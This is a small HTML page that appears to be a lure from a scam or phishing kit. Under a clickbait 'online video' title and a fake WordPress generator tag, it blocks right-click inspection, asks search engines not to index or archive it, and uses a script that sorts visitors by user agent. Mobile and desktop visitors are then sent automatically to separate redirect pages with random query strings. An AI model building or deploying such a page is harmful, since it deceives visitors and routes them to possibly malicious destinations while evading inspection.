<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="live">
    <meta name="keywords" content="">
    <meta name="generator" content="WordPress 5.3.2">
    <title>🔥online video🔥</title>
    <link rel="canonical" href="./video.html">
    <meta name="theme-color" content="#563d7c">
    <meta property="og:url" content="./video.html" />
    <meta name="robots" content="NOINDEX,NOFOLLOW,NOARCHIVE,NOODP,NOSNIPPET">
</head>
<body>
    <!-- Aquí puedes agregar el contenido de tu página -->
    <script type='text/javascript'>
        document.oncontextmenu = function(){return false}
    </script>
    <script type="text/javascript">
        //<![CDATA[
        function h(r, a) { 
            var t = ""; 
            if ("mix" == a) 
                var h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; 
            else 
                var h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; 
            for (var n = 0; r > n; n++) 
                t += h.charAt(Math.floor(Math.random() * h.length)); 
            return t 
        };
        var device = navigator.userAgent;
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i)) {
            window.location = "./redireccionmobile.html?" + h(7, '');
        } else {
            window.location = "./redirecpc.html?" + h(7, '');
        }
        //]]>
    </script>
</body>
</html>
